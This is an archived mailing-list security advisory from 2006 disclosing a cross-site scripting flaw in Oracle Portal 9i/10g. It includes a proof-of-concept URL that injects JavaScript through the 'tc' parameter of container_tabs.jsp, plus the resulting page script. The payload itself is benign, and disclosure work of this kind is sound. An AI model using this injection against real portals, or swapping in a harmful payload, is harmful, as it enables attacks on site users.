Oracle Applications/Portal 9i/10g Cross Site Scripting

From: "putosoft softputo" <hasecorp@xxxxxxxxxxx>
Date: Fri, 22 Dec 2006 08:30:42 +0000

Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the Oracle Portal. The following is one that you may found in any version:

http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---
<script language=javascript>
top.null = null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now', 'null');//.render(window);
</script>
---SNIPPED---

Solution
------------

There is no solution. As a workaround, enable mod_security if it's not. Otherwise wait 6 months/1 year for a patch from Oracle Corp.

_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con MSN Entretenimiento. http://entretenimiento.msn.es/

Prev by Date: rPSA-2006-0234-1 firefox
Next by Date: Re[2]: critical Flaw in Firefox 2.0.0.1 allows to steal the user passwords with a videoclip
Previous by thread: rPSA-2006-0234-1 firefox
Next by thread: TSLSA-2006-0074 - multi
Index(es):
- Date
- Thread

Relevant Pages

[Full-disclosure] Oracle Applications/Portal 9i/10g Cross Site Scripting
... There are plenty of Cross Site Scripting vulnerabilities in the ... Mil ideas para exprimir tu ocio con ...
(Full-Disclosure)
[Full-Disclosure] Re: [SECUNIA] Vulnerability postings
... > It appears that you recently discovered some issues in Owl and SugarCRM. ... The information in this advisory and any of its demonstrations is provided ... Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM ...
(Full-Disclosure)
[Full-disclosure] eXpBlog <= 0.3.5 Cross Site Scripting Vulnerabilities
... eXpBlog <= 0.3.5 Cross Site Scripting Vulnerabilities ... Vendor Site: www.expblog.de ... There are some cross site scripting vulnerabilities which can ...
(Full-Disclosure)
eXpBlog <= 0.3.5 Cross Site Scripting Vulnerabilities
... eXpBlog <= 0.3.5 Cross Site Scripting Vulnerabilities ... Vendor Site: www.expblog.de ... There are some cross site scripting vulnerabilities which can ...
(Bugtraq)
Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities
... Multiple Cross Site Scripting Vulnerabilities ... Discovered by: Khashayar Fereidani Or Dr.Crash ... Our Team Website: HTTP://IRCRASH.COM ...
(Bugtraq)